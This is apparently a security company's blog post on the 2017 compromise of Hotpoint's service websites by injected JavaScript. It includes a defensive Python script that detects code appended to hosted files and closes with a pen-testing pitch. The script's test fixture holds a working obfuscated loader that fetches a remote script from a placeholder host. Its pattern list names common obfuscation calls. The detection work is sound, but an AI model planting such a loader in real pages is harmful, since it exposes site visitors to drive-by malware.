Computer Security Technology Ltd


May 4, 2017

Hotpoint’s UK service websites were hacked over the Easter weekend.

Fake Java update dialogs started appearing on the company’s sites. Clicking on these dialogs took visitors to a malware payload.

The hacker has accomplished this feat by appending malicious JavaScript code to several of the scripts hosted on the Hotpoint service site. It was not readily apparent how the hacker gained write-access to these files, but the WordPress content management system that the site runs on is notorious for being compromised if both it and its plugins are not kept up to date.

The hack has also affected Hotpoint's Irish service website, which is hosted on the same IP address as the UK one.

The appended code is obfuscated to make its purpose less apparent, perhaps in the hope that nobody would dare to delete it. De-obfuscating the code reveals that it is responsible for loading a larger obfuscated script from an external site.
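To show how a site operator could detect the kind of tampering described above (the legitimate script left intact, a loader for a remote script appended after it), here is an added example that is not CSTL's or Hotpoint's code. It assumes the operator keeps known-good copies of every served script from the deployment pipeline and can fetch the live copies for comparison; the file contents, paths and the placeholder hostname are constructed for the example, and the indicator patterns are heuristics chosen here, not a published signature set.

```python
"""Detect code appended to hosted JavaScript files and flag obfuscation
indicators in the added region.

Added example, not code from the original article. Assumes a dictionary of
known-good file contents (e.g. exported from the deployment pipeline) and a
dictionary of the same files as currently served.
"""
import hashlib
import re

# Heuristic indicators of obfuscated or remotely-loading code (assumption:
# these are common shapes, not an exhaustive or authoritative list).
SUSPICIOUS_PATTERNS = [
    (r"\beval\s*\(", "eval() call"),
    (r"\bunescape\s*\(", "unescape() decoding"),
    (r"String\.fromCharCode", "character-code decoding"),
    (r"document\.write\s*\(", "document.write() injection"),
    (r"createElement\s*\(\s*['\"]script['\"]", "dynamic script element"),
    (r"https?://", "literal external URL"),
]


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def appended_region(known_good: bytes, current: bytes) -> bytes:
    """Return the bytes added after the known-good content, or b"" if the file
    was changed in some other way. Appending leaves the original prefix intact,
    so the added region is simply the trailing bytes."""
    if current.startswith(known_good):
        return current[len(known_good):]
    return b""


def suspicious_indicators(code: str) -> list:
    """List the labels of every indicator pattern found in the code."""
    return [label for pattern, label in SUSPICIOUS_PATTERNS if re.search(pattern, code)]


def check_files(known_good: dict, current: dict) -> list:
    """Compare each served file against its known-good copy by hash; for any
    mismatch, analyse the appended region (or the whole file if it was not a
    pure append) and report the indicators seen."""
    findings = []
    for path, content in current.items():
        good = known_good.get(path)
        if good is None:
            # A script the pipeline never produced is itself a finding.
            text = content.decode("utf-8", "replace")
            findings.append({"path": path, "status": "unexpected-file",
                             "indicators": suspicious_indicators(text)})
            continue
        if sha256_hex(content) == sha256_hex(good):
            continue
        tail = appended_region(good, content)
        status = "appended" if tail else "modified"
        analysed = (tail or content).decode("utf-8", "replace")
        findings.append({"path": path, "status": status,
                         "indicators": suspicious_indicators(analysed)})
    return findings


# Constructed samples: a legitimate script, and the same script with a remote
# loader appended. The hostname is a placeholder, not an indicator from the
# article. Note that the "http" scheme is assembled at runtime, so the naive
# URL pattern does not fire; the other indicators still do.
CLEAN_JS = b"function activateGuarantee(){ return fetch('/api/activate'); }\n"
APPENDED_LOADER = (
    b"var s=document.createElement('script');"
    b"s.src=String.fromCharCode(104,116,116,112)+'://placeholder.invalid/x.js';"
    b"document.body.appendChild(s);\n"
)
KNOWN_GOOD = {"/js/guarantee.js": CLEAN_JS, "/js/vendor.js": b"var vendor=1;\n"}
LIVE = {"/js/guarantee.js": CLEAN_JS + APPENDED_LOADER, "/js/vendor.js": b"var vendor=1;\n"}


def run_demo() -> list:
    return check_files(KNOWN_GOOD, LIVE)


if __name__ == "__main__":
    for finding in run_demo():
        print(finding["path"], finding["status"], ", ".join(finding["indicators"]))
```

The hash comparison alone is enough to raise the alarm; the indicator scan only tells the responder what kind of code was added, and the sample shows why such patterns cannot be relied on on their own, since even trivial string assembly hides the literal URL. Running the comparison on a schedule over the whole document root, rather than only at deployment time, is what would have caught a change made over a bank holiday weekend.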

Presumably, this external site is operated by the hacker, in which case he has the opportunity to change the content of his malicious payload at will. Any visitor to the Hotpoint service site could consequently be at risk of much more serious attacks, such as drive-by malware or phishing.

Many bank holiday shoppers who buy Hotpoint white goods are likely to fall victim to this attack, as the paperwork included with new appliances directs new customers to the site to activate their 10 year parts guarantee.

Existing customers desperate to find out about certain models of dangerous tumble dryers are also likely to be snared by the JavaScript attack.

Generally, the Easter bank holiday weekend is a good time for hackers to strike UK websites, as many people will be on holiday on both Good Friday and the following Monday. The longer the attacker can keep his redirection code in place, the more revenue he can reap.

Of course, there could be wider-reaching repercussions to this attack – if an attacker has been able to modify scripts on Hotpoint's website, then he could also have been in a position to view any data stored or transmitted by the site.

How can Pen testing prevent vulnerabilities?

One of the key steps in measuring operational risk is understanding where you are vulnerable to attack, and where you may already have been compromised.

Penetration (Pen) Testing is a specialised discipline that encompasses a lot more than simply running a Vulnerability Assessment (VA) tool. Pen tests should follow formal procedures, use a multitude of scan tools and, more importantly, be undertaken by experienced engineers who can interpret the Vulnerability Assessment results to create stronger cascading attack scenarios. The test should also be undertaken by staff independent of any other function, to ensure the testers provide objective and impartial reports. CST can help with this approach.

You can read the original story here.